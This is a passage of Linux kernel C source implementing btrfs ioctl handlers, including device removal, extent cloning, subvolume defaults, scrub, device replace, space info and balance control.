struct btrfs_root *root = BTRFS_I(fdentry(file)->d_inode)->root;
struct btrfs_ioctl_vol_args *vol_args;
int ret;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
ret = mnt_want_write_file(file);
if (ret)
return ret;
if (atomic_xchg(&root->fs_info->mutually_exclusive_operation_running,
1)) {
pr_info("btrfs: dev add/delete/balance/replace/resize operation in progress\n");
mnt_drop_write_file(file);
return -EINPROGRESS;
}
mutex_lock(&root->fs_info->volume_mutex);
vol_args = memdup_user(arg, sizeof(*vol_args));
if (IS_ERR(vol_args)) {
ret = PTR_ERR(vol_args);
goto out;
}
vol_args->name[BTRFS_PATH_NAME_MAX] = '\0';
ret = btrfs_rm_device(root, vol_args->name);
kfree(vol_args);
out:
mutex_unlock(&root->fs_info->volume_mutex);
mnt_drop_write_file(file);
atomic_set(&root->fs_info->mutually_exclusive_operation_running, 0);
return ret;
}
static long btrfs_ioctl_fs_info(struct btrfs_root *root, void __user *arg)
{
struct btrfs_ioctl_fs_info_args *fi_args;
struct btrfs_device *device;
struct btrfs_device *next;
struct btrfs_fs_devices *fs_devices = root->fs_info->fs_devices;
int ret = 0;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
fi_args = kzalloc(sizeof(*fi_args), GFP_KERNEL);
if (!fi_args)
return -ENOMEM;
fi_args->num_devices = fs_devices->num_devices;
memcpy(&fi_args->fsid, root->fs_info->fsid, sizeof(fi_args->fsid));
mutex_lock(&fs_devices->device_list_mutex);
list_for_each_entry_safe(device, next, &fs_devices->devices, dev_list) {
if (device->devid > fi_args->max_id)
fi_args->max_id = device->devid;
}
mutex_unlock(&fs_devices->device_list_mutex);
if (copy_to_user(arg, fi_args, sizeof(*fi_args)))
ret = -EFAULT;
kfree(fi_args);
return ret;
}
static long btrfs_ioctl_dev_info(struct btrfs_root *root, void __user *arg)
{
struct btrfs_ioctl_dev_info_args *di_args;
struct btrfs_device *dev;
struct btrfs_fs_devices *fs_devices = root->fs_info->fs_devices;
int ret = 0;
char *s_uuid = NULL;
char empty_uuid[BTRFS_UUID_SIZE] = {0};
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
di_args = memdup_user(arg, sizeof(*di_args));
if (IS_ERR(di_args))
return PTR_ERR(di_args);
if (memcmp(empty_uuid, di_args->uuid, BTRFS_UUID_SIZE) != 0)
s_uuid = di_args->uuid;
mutex_lock(&fs_devices->device_list_mutex);
dev = btrfs_find_device(root->fs_info, di_args->devid, s_uuid, NULL);
mutex_unlock(&fs_devices->device_list_mutex);
if (!dev) {
ret = -ENODEV;
goto out;
}
di_args->devid = dev->devid;
di_args->bytes_used = dev->bytes_used;
di_args->total_bytes = dev->total_bytes;
memcpy(di_args->uuid, dev->uuid, sizeof(di_args->uuid));
if (dev->name) {
struct rcu_string *name;
rcu_read_lock();
name = rcu_dereference(dev->name);
strncpy(di_args->path, name->str, sizeof(di_args->path));
rcu_read_unlock();
di_args->path[sizeof(di_args->path) - 1] = 0;
} else {
di_args->path[0] = '\0';
}
out:
if (ret == 0 && copy_to_user(arg, di_args, sizeof(*di_args)))
ret = -EFAULT;
kfree(di_args);
return ret;
}
static noinline long btrfs_ioctl_clone(struct file *file, unsigned long srcfd,
u64 off, u64 olen, u64 destoff)
{
struct inode *inode = fdentry(file)->d_inode;
struct btrfs_root *root = BTRFS_I(inode)->root;
struct fd src_file;
struct inode *src;
struct btrfs_trans_handle *trans;
struct btrfs_path *path;
struct extent_buffer *leaf;
char *buf;
struct btrfs_key key;
u32 nritems;
int slot;
int ret;
u64 len = olen;
u64 bs = root->fs_info->sb->s_blocksize;
/*
* TODO:
* - split compressed inline extents. annoying: we need to
* decompress into destination's address_space (the file offset
* may change, so source mapping won't do), then recompress (or
* otherwise reinsert) a subrange.
* - allow ranges within the same file to be cloned (provided
* they don't overlap)?
*/
/* the destination must be opened for writing */
if (!(file->f_mode & FMODE_WRITE) || (file->f_flags & O_APPEND))
return -EINVAL;
if (btrfs_root_readonly(root))
return -EROFS;
ret = mnt_want_write_file(file);
if (ret)
return ret;
src_file = fdget(srcfd);
if (!src_file.file) {
ret = -EBADF;
goto out_drop_write;
}
ret = -EXDEV;
if (src_file.file->f_path.mnt != file->f_path.mnt)
goto out_fput;
src = src_file.file->f_dentry->d_inode;
ret = -EINVAL;
if (src == inode)
goto out_fput;
/* the src must be open for reading */
if (!(src_file.file->f_mode & FMODE_READ))
goto out_fput;
/* don't make the dst file partly checksummed */
if ((BTRFS_I(src)->flags & BTRFS_INODE_NODATASUM) !=
(BTRFS_I(inode)->flags & BTRFS_INODE_NODATASUM))
goto out_fput;
ret = -EISDIR;
if (S_ISDIR(src->i_mode) || S_ISDIR(inode->i_mode))
goto out_fput;
ret = -EXDEV;
if (src->i_sb != inode->i_sb)
goto out_fput;
ret = -ENOMEM;
buf = vmalloc(btrfs_level_size(root, 0));
if (!buf)
goto out_fput;
path = btrfs_alloc_path();
if (!path) {
vfree(buf);
goto out_fput;
}
path->reada = 2;
if (inode < src) {
mutex_lock_nested(&inode->i_mutex, I_MUTEX_PARENT);
mutex_lock_nested(&src->i_mutex, I_MUTEX_CHILD);
} else {
mutex_lock_nested(&src->i_mutex, I_MUTEX_PARENT);
mutex_lock_nested(&inode->i_mutex, I_MUTEX_CHILD);
}
/* determine range to clone */
ret = -EINVAL;
if (off + len > src->i_size || off + len < off)
goto out_unlock;
if (len == 0)
olen = len = src->i_size - off;
/* if we extend to eof, continue to block boundary */
if (off + len == src->i_size)
len = ALIGN(src->i_size, bs) - off;
/* verify the end result is block aligned */
if (!IS_ALIGNED(off, bs) || !IS_ALIGNED(off + len, bs) ||
!IS_ALIGNED(destoff, bs))
goto out_unlock;
if (destoff > inode->i_size) {
ret = btrfs_cont_expand(inode, inode->i_size, destoff);
if (ret)
goto out_unlock;
}
/* truncate page cache pages from target inode range */
truncate_inode_pages_range(&inode->i_data, destoff,
PAGE_CACHE_ALIGN(destoff + len) - 1);
/* do any pending delalloc/csum calc on src, one way or
another, and lock file content */
while (1) {
struct btrfs_ordered_extent *ordered;
lock_extent(&BTRFS_I(src)->io_tree, off, off + len - 1);
ordered = btrfs_lookup_first_ordered_extent(src, off + len - 1);
if (!ordered &&
!test_range_bit(&BTRFS_I(src)->io_tree, off, off + len - 1,
EXTENT_DELALLOC, 0, NULL))
break;
unlock_extent(&BTRFS_I(src)->io_tree, off, off + len - 1);
if (ordered)
btrfs_put_ordered_extent(ordered);
btrfs_wait_ordered_range(src, off, len);
}
/* clone data */
key.objectid = btrfs_ino(src);
key.type = BTRFS_EXTENT_DATA_KEY;
key.offset = 0;
while (1) {
/*
* note the key will change type as we walk through the
* tree.
*/
ret = btrfs_search_slot(NULL, BTRFS_I(src)->root, &key, path,
0, 0);
if (ret < 0)
goto out;
nritems = btrfs_header_nritems(path->nodes[0]);
if (path->slots[0] >= nritems) {
ret = btrfs_next_leaf(BTRFS_I(src)->root, path);
if (ret < 0)
goto out;
if (ret > 0)
break;
nritems = btrfs_header_nritems(path->nodes[0]);
}
leaf = path->nodes[0];
slot = path->slots[0];
btrfs_item_key_to_cpu(leaf, &key, slot);
if (btrfs_key_type(&key) > BTRFS_EXTENT_DATA_KEY ||
key.objectid != btrfs_ino(src))
break;
if (btrfs_key_type(&key) == BTRFS_EXTENT_DATA_KEY) {
struct btrfs_file_extent_item *extent;
int type;
u32 size;
struct btrfs_key new_key;
u64 disko = 0, diskl = 0;
u64 datao = 0, datal = 0;
u8 comp;
u64 endoff;
size = btrfs_item_size_nr(leaf, slot);
read_extent_buffer(leaf, buf,
btrfs_item_ptr_offset(leaf, slot),
size);
extent = btrfs_item_ptr(leaf, slot,
struct btrfs_file_extent_item);
comp = btrfs_file_extent_compression(leaf, extent);
type = btrfs_file_extent_type(leaf, extent);
if (type == BTRFS_FILE_EXTENT_REG ||
type == BTRFS_FILE_EXTENT_PREALLOC) {
disko = btrfs_file_extent_disk_bytenr(leaf,
extent);
diskl = btrfs_file_extent_disk_num_bytes(leaf,
extent);
datao = btrfs_file_extent_offset(leaf, extent);
datal = btrfs_file_extent_num_bytes(leaf,
extent);
} else if (type == BTRFS_FILE_EXTENT_INLINE) {
/* take upper bound, may be compressed */
datal = btrfs_file_extent_ram_bytes(leaf,
extent);
}
btrfs_release_path(path);
if (key.offset + datal <= off ||
key.offset >= off + len - 1)
goto next;
memcpy(&new_key, &key, sizeof(new_key));
new_key.objectid = btrfs_ino(inode);
if (off <= key.offset)
new_key.offset = key.offset + destoff - off;
else
new_key.offset = destoff;
/*
* 1 - adjusting old extent (we may have to split it)
* 1 - add new extent
* 1 - inode update
*/
trans = btrfs_start_transaction(root, 3);
if (IS_ERR(trans)) {
ret = PTR_ERR(trans);
goto out;
}
if (type == BTRFS_FILE_EXTENT_REG ||
type == BTRFS_FILE_EXTENT_PREALLOC) {
/*
* a | --- range to clone ---| b
* | ------------- extent ------------- |
*/
/* substract range b */
if (key.offset + datal > off + len)
datal = off + len - key.offset;
/* substract range a */
if (off > key.offset) {
datao += off - key.offset;
datal -= off - key.offset;
}
ret = btrfs_drop_extents(trans, root, inode,
new_key.offset,
new_key.offset + datal,
1);
if (ret) {
btrfs_abort_transaction(trans, root,
ret);
btrfs_end_transaction(trans, root);
goto out;
}
ret = btrfs_insert_empty_item(trans, root, path,
&new_key, size);
if (ret) {
btrfs_abort_transaction(trans, root,
ret);
btrfs_end_transaction(trans, root);
goto out;
}
leaf = path->nodes[0];
slot = path->slots[0];
write_extent_buffer(leaf, buf,
btrfs_item_ptr_offset(leaf, slot),
size);
extent = btrfs_item_ptr(leaf, slot,
struct btrfs_file_extent_item);
/* disko == 0 means it's a hole */
if (!disko)
datao = 0;
btrfs_set_file_extent_offset(leaf, extent,
datao);
btrfs_set_file_extent_num_bytes(leaf, extent,
datal);
if (disko) {
inode_add_bytes(inode, datal);
ret = btrfs_inc_extent_ref(trans, root,
disko, diskl, 0,
root->root_key.objectid,
btrfs_ino(inode),
new_key.offset - datao,
0);
if (ret) {
btrfs_abort_transaction(trans,
root,
ret);
btrfs_end_transaction(trans,
root);
goto out;
}
}
} else if (type == BTRFS_FILE_EXTENT_INLINE) {
u64 skip = 0;
u64 trim = 0;
if (off > key.offset) {
skip = off - key.offset;
new_key.offset += skip;
}
if (key.offset + datal > off + len)
trim = key.offset + datal - (off + len);
if (comp && (skip || trim)) {
ret = -EINVAL;
btrfs_end_transaction(trans, root);
goto out;
}
size -= skip + trim;
datal -= skip + trim;
ret = btrfs_drop_extents(trans, root, inode,
new_key.offset,
new_key.offset + datal,
1);
if (ret) {
btrfs_abort_transaction(trans, root,
ret);
btrfs_end_transaction(trans, root);
goto out;
}
ret = btrfs_insert_empty_item(trans, root, path,
&new_key, size);
if (ret) {
btrfs_abort_transaction(trans, root,
ret);
btrfs_end_transaction(trans, root);
goto out;
}
if (skip) {
u32 start =
btrfs_file_extent_calc_inline_size(0);
memmove(buf+start, buf+start+skip,
datal);
}
leaf = path->nodes[0];
slot = path->slots[0];
write_extent_buffer(leaf, buf,
btrfs_item_ptr_offset(leaf, slot),
size);
inode_add_bytes(inode, datal);
}
btrfs_mark_buffer_dirty(leaf);
btrfs_release_path(path);
inode_inc_iversion(inode);
inode->i_mtime = inode->i_ctime = CURRENT_TIME;
/*
* we round up to the block size at eof when
* determining which extents to clone above,
* but shouldn't round up the file size
*/
endoff = new_key.offset + datal;
if (endoff > destoff+olen)
endoff = destoff+olen;
if (endoff > inode->i_size)
btrfs_i_size_write(inode, endoff);
ret = btrfs_update_inode(trans, root, inode);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
btrfs_end_transaction(trans, root);
goto out;
}
ret = btrfs_end_transaction(trans, root);
}
next:
btrfs_release_path(path);
key.offset++;
}
ret = 0;
out:
btrfs_release_path(path);
unlock_extent(&BTRFS_I(src)->io_tree, off, off + len - 1);
out_unlock:
mutex_unlock(&src->i_mutex);
mutex_unlock(&inode->i_mutex);
vfree(buf);
btrfs_free_path(path);
out_fput:
fdput(src_file);
out_drop_write:
mnt_drop_write_file(file);
return ret;
}
static long btrfs_ioctl_clone_range(struct file *file, void __user *argp)
{
struct btrfs_ioctl_clone_range_args args;
if (copy_from_user(&args, argp, sizeof(args)))
return -EFAULT;
return btrfs_ioctl_clone(file, args.src_fd, args.src_offset,
args.src_length, args.dest_offset);
}
/*
* there are many ways the trans_start and trans_end ioctls can lead
* to deadlocks. They should only be used by applications that
* basically own the machine, and have a very in depth understanding
* of all the possible deadlocks and enospc problems.
*/
static long btrfs_ioctl_trans_start(struct file *file)
{
struct inode *inode = fdentry(file)->d_inode;
struct btrfs_root *root = BTRFS_I(inode)->root;
struct btrfs_trans_handle *trans;
int ret;
ret = -EPERM;
if (!capable(CAP_SYS_ADMIN))
goto out;
ret = -EINPROGRESS;
if (file->private_data)
goto out;
ret = -EROFS;
if (btrfs_root_readonly(root))
goto out;
ret = mnt_want_write_file(file);
if (ret)
goto out;
atomic_inc(&root->fs_info->open_ioctl_trans);
ret = -ENOMEM;
trans = btrfs_start_ioctl_transaction(root);
if (IS_ERR(trans))
goto out_drop;
file->private_data = trans;
return 0;
out_drop:
atomic_dec(&root->fs_info->open_ioctl_trans);
mnt_drop_write_file(file);
out:
return ret;
}
static long btrfs_ioctl_default_subvol(struct file *file, void __user *argp)
{
struct inode *inode = fdentry(file)->d_inode;
struct btrfs_root *root = BTRFS_I(inode)->root;
struct btrfs_root *new_root;
struct btrfs_dir_item *di;
struct btrfs_trans_handle *trans;
struct btrfs_path *path;
struct btrfs_key location;
struct btrfs_disk_key disk_key;
u64 objectid = 0;
u64 dir_id;
int ret;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
ret = mnt_want_write_file(file);
if (ret)
return ret;
if (copy_from_user(&objectid, argp, sizeof(objectid))) {
ret = -EFAULT;
goto out;
}
if (!objectid)
objectid = root->root_key.objectid;
location.objectid = objectid;
location.type = BTRFS_ROOT_ITEM_KEY;
location.offset = (u64)-1;
new_root = btrfs_read_fs_root_no_name(root->fs_info, &location);
if (IS_ERR(new_root)) {
ret = PTR_ERR(new_root);
goto out;
}
if (btrfs_root_refs(&new_root->root_item) == 0) {
ret = -ENOENT;
goto out;
}
path = btrfs_alloc_path();
if (!path) {
ret = -ENOMEM;
goto out;
}
path->leave_spinning = 1;
trans = btrfs_start_transaction(root, 1);
if (IS_ERR(trans)) {
btrfs_free_path(path);
ret = PTR_ERR(trans);
goto out;
}
dir_id = btrfs_super_root_dir(root->fs_info->super_copy);
di = btrfs_lookup_dir_item(trans, root->fs_info->tree_root, path,
dir_id, "default", 7, 1);
if (IS_ERR_OR_NULL(di)) {
btrfs_free_path(path);
btrfs_end_transaction(trans, root);
printk(KERN_ERR "Umm, you don't have the default dir item, "
"this isn't going to work\n");
ret = -ENOENT;
goto out;
}
btrfs_cpu_key_to_disk(&disk_key, &new_root->root_key);
btrfs_set_dir_item_key(path->nodes[0], di, &disk_key);
btrfs_mark_buffer_dirty(path->nodes[0]);
btrfs_free_path(path);
btrfs_set_fs_incompat(root->fs_info, DEFAULT_SUBVOL);
btrfs_end_transaction(trans, root);
out:
mnt_drop_write_file(file);
return ret;
}
void btrfs_get_block_group_info(struct list_head *groups_list,
struct btrfs_ioctl_space_info *space)
{
struct btrfs_block_group_cache *block_group;
space->total_bytes = 0;
space->used_bytes = 0;
space->flags = 0;
list_for_each_entry(block_group, groups_list, list) {
space->flags = block_group->flags;
space->total_bytes += block_group->key.offset;
space->used_bytes +=
btrfs_block_group_used(&block_group->item);
}
}
long btrfs_ioctl_space_info(struct btrfs_root *root, void __user *arg)
{
struct btrfs_ioctl_space_args space_args;
struct btrfs_ioctl_space_info space;
struct btrfs_ioctl_space_info *dest;
struct btrfs_ioctl_space_info *dest_orig;
struct btrfs_ioctl_space_info __user *user_dest;
struct btrfs_space_info *info;
u64 types[] = {BTRFS_BLOCK_GROUP_DATA,
BTRFS_BLOCK_GROUP_SYSTEM,
BTRFS_BLOCK_GROUP_METADATA,
BTRFS_BLOCK_GROUP_DATA | BTRFS_BLOCK_GROUP_METADATA};
int num_types = 4;
int alloc_size;
int ret = 0;
u64 slot_count = 0;
int i, c;
if (copy_from_user(&space_args,
(struct btrfs_ioctl_space_args __user *)arg,
sizeof(space_args)))
return -EFAULT;
for (i = 0; i < num_types; i++) {
struct btrfs_space_info *tmp;
info = NULL;
rcu_read_lock();
list_for_each_entry_rcu(tmp, &root->fs_info->space_info,
list) {
if (tmp->flags == types[i]) {
info = tmp;
break;
}
}
rcu_read_unlock();
if (!info)
continue;
down_read(&info->groups_sem);
for (c = 0; c < BTRFS_NR_RAID_TYPES; c++) {
if (!list_empty(&info->block_groups[c]))
slot_count++;
}
up_read(&info->groups_sem);
}
/* space_slots == 0 means they are asking for a count */
if (space_args.space_slots == 0) {
space_args.total_spaces = slot_count;
goto out;
}
slot_count = min_t(u64, space_args.space_slots, slot_count);
alloc_size = sizeof(*dest) * slot_count;
/* we generally have at most 6 or so space infos, one for each raid
* level. So, a whole page should be more than enough for everyone
*/
if (alloc_size > PAGE_CACHE_SIZE)
return -ENOMEM;
space_args.total_spaces = 0;
dest = kmalloc(alloc_size, GFP_NOFS);
if (!dest)
return -ENOMEM;
dest_orig = dest;
/* now we have a buffer to copy into */
for (i = 0; i < num_types; i++) {
struct btrfs_space_info *tmp;
if (!slot_count)
break;
info = NULL;
rcu_read_lock();
list_for_each_entry_rcu(tmp, &root->fs_info->space_info,
list) {
if (tmp->flags == types[i]) {
info = tmp;
break;
}
}
rcu_read_unlock();
if (!info)
continue;
down_read(&info->groups_sem);
for (c = 0; c < BTRFS_NR_RAID_TYPES; c++) {
if (!list_empty(&info->block_groups[c])) {
btrfs_get_block_group_info(
&info->block_groups[c], &space);
memcpy(dest, &space, sizeof(space));
dest++;
space_args.total_spaces++;
slot_count--;
}
if (!slot_count)
break;
}
up_read(&info->groups_sem);
}
user_dest = (struct btrfs_ioctl_space_info __user *)
(arg + sizeof(struct btrfs_ioctl_space_args));
if (copy_to_user(user_dest, dest_orig, alloc_size))
ret = -EFAULT;
kfree(dest_orig);
out:
if (ret == 0 && copy_to_user(arg, &space_args, sizeof(space_args)))
ret = -EFAULT;
return ret;
}
/*
* there are many ways the trans_start and trans_end ioctls can lead
* to deadlocks. They should only be used by applications that
* basically own the machine, and have a very in depth understanding
* of all the possible deadlocks and enospc problems.
*/
long btrfs_ioctl_trans_end(struct file *file)
{
struct inode *inode = fdentry(file)->d_inode;
struct btrfs_root *root = BTRFS_I(inode)->root;
struct btrfs_trans_handle *trans;
trans = file->private_data;
if (!trans)
return -EINVAL;
file->private_data = NULL;
btrfs_end_transaction(trans, root);
atomic_dec(&root->fs_info->open_ioctl_trans);
mnt_drop_write_file(file);
return 0;
}
static noinline long btrfs_ioctl_start_sync(struct btrfs_root *root,
void __user *argp)
{
struct btrfs_trans_handle *trans;
u64 transid;
int ret;
trans = btrfs_attach_transaction(root);
if (IS_ERR(trans)) {
if (PTR_ERR(trans) != -ENOENT)
return PTR_ERR(trans);
/* No running transaction, don't bother */
transid = root->fs_info->last_trans_committed;
goto out;
}
transid = trans->transid;
ret = btrfs_commit_transaction_async(trans, root, 0);
if (ret) {
btrfs_end_transaction(trans, root);
return ret;
}
out:
if (argp)
if (copy_to_user(argp, &transid, sizeof(transid)))
return -EFAULT;
return 0;
}
static noinline long btrfs_ioctl_wait_sync(struct btrfs_root *root,
void __user *argp)
{
u64 transid;
if (argp) {
if (copy_from_user(&transid, argp, sizeof(transid)))
return -EFAULT;
} else {
transid = 0; /* current trans */
}
return btrfs_wait_for_commit(root, transid);
}
static long btrfs_ioctl_scrub(struct file *file, void __user *arg)
{
struct btrfs_root *root = BTRFS_I(fdentry(file)->d_inode)->root;
struct btrfs_ioctl_scrub_args *sa;
int ret;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
sa = memdup_user(arg, sizeof(*sa));
if (IS_ERR(sa))
return PTR_ERR(sa);
if (!(sa->flags & BTRFS_SCRUB_READONLY)) {
ret = mnt_want_write_file(file);
if (ret)
goto out;
}
ret = btrfs_scrub_dev(root->fs_info, sa->devid, sa->start, sa->end,
&sa->progress, sa->flags & BTRFS_SCRUB_READONLY,
0);
if (copy_to_user(arg, sa, sizeof(*sa)))
ret = -EFAULT;
if (!(sa->flags & BTRFS_SCRUB_READONLY))
mnt_drop_write_file(file);
out:
kfree(sa);
return ret;
}
static long btrfs_ioctl_scrub_cancel(struct btrfs_root *root, void __user *arg)
{
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
return btrfs_scrub_cancel(root->fs_info);
}
static long btrfs_ioctl_scrub_progress(struct btrfs_root *root,
void __user *arg)
{
struct btrfs_ioctl_scrub_args *sa;
int ret;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
sa = memdup_user(arg, sizeof(*sa));
if (IS_ERR(sa))
return PTR_ERR(sa);
ret = btrfs_scrub_progress(root, sa->devid, &sa->progress);
if (copy_to_user(arg, sa, sizeof(*sa)))
ret = -EFAULT;
kfree(sa);
return ret;
}
static long btrfs_ioctl_get_dev_stats(struct btrfs_root *root,
void __user *arg)
{
struct btrfs_ioctl_get_dev_stats *sa;
int ret;
sa = memdup_user(arg, sizeof(*sa));
if (IS_ERR(sa))
return PTR_ERR(sa);
if ((sa->flags & BTRFS_DEV_STATS_RESET) && !capable(CAP_SYS_ADMIN)) {
kfree(sa);
return -EPERM;
}
ret = btrfs_get_dev_stats(root, sa);
if (copy_to_user(arg, sa, sizeof(*sa)))
ret = -EFAULT;
kfree(sa);
return ret;
}
static long btrfs_ioctl_dev_replace(struct btrfs_root *root, void __user *arg)
{
struct btrfs_ioctl_dev_replace_args *p;
int ret;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
p = memdup_user(arg, sizeof(*p));
if (IS_ERR(p))
return PTR_ERR(p);
switch (p->cmd) {
case BTRFS_IOCTL_DEV_REPLACE_CMD_START:
if (atomic_xchg(
&root->fs_info->mutually_exclusive_operation_running,
1)) {
pr_info("btrfs: dev add/delete/balance/replace/resize operation in progress\n");
ret = -EINPROGRESS;
} else {
ret = btrfs_dev_replace_start(root, p);
atomic_set(
&root->fs_info->mutually_exclusive_operation_running,
0);
}
break;
case BTRFS_IOCTL_DEV_REPLACE_CMD_STATUS:
btrfs_dev_replace_status(root->fs_info, p);
ret = 0;
break;
case BTRFS_IOCTL_DEV_REPLACE_CMD_CANCEL:
ret = btrfs_dev_replace_cancel(root->fs_info, p);
break;
default:
ret = -EINVAL;
break;
}
if (copy_to_user(arg, p, sizeof(*p)))
ret = -EFAULT;
kfree(p);
return ret;
}
static long btrfs_ioctl_ino_to_path(struct btrfs_root *root, void __user *arg)
{
int ret = 0;
int i;
u64 rel_ptr;
int size;
struct btrfs_ioctl_ino_path_args *ipa = NULL;
struct inode_fs_paths *ipath = NULL;
struct btrfs_path *path;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
path = btrfs_alloc_path();
if (!path) {
ret = -ENOMEM;
goto out;
}
ipa = memdup_user(arg, sizeof(*ipa));
if (IS_ERR(ipa)) {
ret = PTR_ERR(ipa);
ipa = NULL;
goto out;
}
size = min_t(u32, ipa->size, 4096);
ipath = init_ipath(size, root, path);
if (IS_ERR(ipath)) {
ret = PTR_ERR(ipath);
ipath = NULL;
goto out;
}
ret = paths_from_inode(ipa->inum, ipath);
if (ret < 0)
goto out;
for (i = 0; i < ipath->fspath->elem_cnt; ++i) {
rel_ptr = ipath->fspath->val[i] -
(u64)(unsigned long)ipath->fspath->val;
ipath->fspath->val[i] = rel_ptr;
}
ret = copy_to_user((void *)(unsigned long)ipa->fspath,
(void *)(unsigned long)ipath->fspath, size);
if (ret) {
ret = -EFAULT;
goto out;
}
out:
btrfs_free_path(path);
free_ipath(ipath);
kfree(ipa);
return ret;
}
static int build_ino_list(u64 inum, u64 offset, u64 root, void *ctx)
{
struct btrfs_data_container *inodes = ctx;
const size_t c = 3 * sizeof(u64);
if (inodes->bytes_left >= c) {
inodes->bytes_left -= c;
inodes->val[inodes->elem_cnt] = inum;
inodes->val[inodes->elem_cnt + 1] = offset;
inodes->val[inodes->elem_cnt + 2] = root;
inodes->elem_cnt += 3;
} else {
inodes->bytes_missing += c - inodes->bytes_left;
inodes->bytes_left = 0;
inodes->elem_missed += 3;
}
return 0;
}
static long btrfs_ioctl_logical_to_ino(struct btrfs_root *root,
void __user *arg)
{
int ret = 0;
int size;
struct btrfs_ioctl_logical_ino_args *loi;
struct btrfs_data_container *inodes = NULL;
struct btrfs_path *path = NULL;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
loi = memdup_user(arg, sizeof(*loi));
if (IS_ERR(loi)) {
ret = PTR_ERR(loi);
loi = NULL;
goto out;
}
path = btrfs_alloc_path();
if (!path) {
ret = -ENOMEM;
goto out;
}
size = min_t(u32, loi->size, 64 * 1024);
inodes = init_data_container(size);
if (IS_ERR(inodes)) {
ret = PTR_ERR(inodes);
inodes = NULL;
goto out;
}
ret = iterate_inodes_from_logical(loi->logical, root->fs_info, path,
build_ino_list, inodes);
if (ret == -EINVAL)
ret = -ENOENT;
if (ret < 0)
goto out;
ret = copy_to_user((void *)(unsigned long)loi->inodes,
(void *)(unsigned long)inodes, size);
if (ret)
ret = -EFAULT;
out:
btrfs_free_path(path);
vfree(inodes);
kfree(loi);
return ret;
}
void update_ioctl_balance_args(struct btrfs_fs_info *fs_info, int lock,
struct btrfs_ioctl_balance_args *bargs)
{
struct btrfs_balance_control *bctl = fs_info->balance_ctl;
bargs->flags = bctl->flags;
if (atomic_read(&fs_info->balance_running))
bargs->state |= BTRFS_BALANCE_STATE_RUNNING;
if (atomic_read(&fs_info->balance_pause_req))
bargs->state |= BTRFS_BALANCE_STATE_PAUSE_REQ;
if (atomic_read(&fs_info->balance_cancel_req))
bargs->state |= BTRFS_BALANCE_STATE_CANCEL_REQ;
memcpy(&bargs->data, &bctl->data, sizeof(bargs->data));
memcpy(&bargs->meta, &bctl->meta, sizeof(bargs->meta));
memcpy(&bargs->sys, &bctl->sys, sizeof(bargs->sys));
if (lock) {
spin_lock(&fs_info->balance_lock);
memcpy(&bargs->stat, &bctl->stat, sizeof(bargs->stat));
spin_unlock(&fs_info->balance_lock);
} else {
memcpy(&bargs->stat, &bctl->stat, sizeof(bargs->stat));
}
}
static long btrfs_ioctl_balance(struct file *file, void __user *arg)
{
struct btrfs_root *root = BTRFS_I(fdentry(file)->d_inode)->root;
struct btrfs_fs_info *fs_info = root->fs_info;
struct btrfs_ioctl_balance_args *bargs;
struct btrfs_balance_control *bctl;
int ret;
int need_to_clear_lock = 0;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
ret = mnt_want_write_file(file);
if (ret)
return ret;
mutex_lock(&fs_info->volume_mutex);
mutex_lock(&fs_info->balance_mutex);
if (arg) {
bargs = memdup_user(arg, sizeof(*bargs));
if (IS_ERR(bargs)) {
ret = PTR_ERR(bargs);
goto out;
}
if (bargs->flags & BTRFS_BALANCE_RESUME) {
if (!fs_info->balance_ctl) {
ret = -ENOTCONN;
goto out_bargs;
}
bctl = fs_info->balance_ctl;
spin_lock(&fs_info->balance_lock);
bctl->flags |= BTRFS_BALANCE_RESUME;
spin_unlock(&fs_info->balance_lock);
goto do_balance;
}
} else {
bargs = NULL;
}
if (atomic_xchg(&root->fs_info->mutually_exclusive_operation_running,
1)) {
pr_info("btrfs: dev add/delete/balance/replace/resize operation in progress\n");
ret = -EINPROGRESS;
goto out_bargs;
}
need_to_clear_lock = 1;
bctl = kzalloc(sizeof(*bctl), GFP_NOFS);
if (!bctl) {
ret = -ENOMEM;
goto out_bargs;
}
bctl->fs_info = fs_info;
if (arg) {
memcpy(&bctl->data, &bargs->data, sizeof(bctl->data));
memcpy(&bctl->meta, &bargs->meta, sizeof(bctl->meta));
memcpy(&bctl->sys, &bargs->sys, sizeof(bctl->sys));
bctl->flags = bargs->flags;
} else {
/* balance everything - no filters */
bctl->flags |= BTRFS_BALANCE_TYPE_MASK;
}
do_balance:
ret = btrfs_balance(bctl, bargs);
/*
* bctl is freed in __cancel_balance or in free_fs_info if
* restriper was paused all the way until unmount
*/
if (arg) {
if (copy_to_user(arg, bargs, sizeof(*bargs)))
ret = -EFAULT;
}
out_bargs:
kfree(bargs);
out:
if (need_to_clear_lock)
atomic_set(&root->fs_info->mutually_exclusive_operation_running,
0);
mutex_unlock(&fs_info->balance_mutex);
mutex_unlock(&fs_info->volume_mutex);
mnt_drop_write_file(file);
return ret;
}
static long btrfs_ioctl_balance_ctl(struct btrfs_root *root, int cmd)
{
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
switch (cmd) {
case BTRFS_BALANCE_CTL_PAUSE:
return btrfs_pause_balance(root->fs_info);
case BTRFS_BALANCE_CTL_CANCEL:
return btrfs_cancel_balance(root->fs_info);
}
return -EINVAL;
}
static long btrfs_ioctl_balance_progress(struct btrfs_root *root,
void __user *arg)
{
struct btrfs_fs_info *fs_info = root->fs_info;
struct btrfs_ioctl_balance_args *bargs;
int ret = 0;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
mutex_lock(&fs_info->balance_mutex);
if (!fs_info->balance_ctl) {
ret = -ENOTCONN;
goto out;
}
bargs = kzalloc(sizeof(*bargs), GFP_NOFS);
if (!bargs) {
ret = -ENOMEM;
goto out;
}
update_ioctl_balance_args(fs_info, 1, bargs);
if (copy_to_user(arg, bargs, sizeof(*bargs)))
ret = -EFAULT;
kfree(bargs);
out:
mutex_unlock(&fs_info->balance_mutex);
return ret;
}
static long btrfs_ioctl_quota_ctl(struct file *file, void __user *arg)
{
struct btrfs_root *root = BTRFS_I(fdentry(file)->d_inode)->root;
struct btrfs_ioctl_quota_ctl_args *sa;
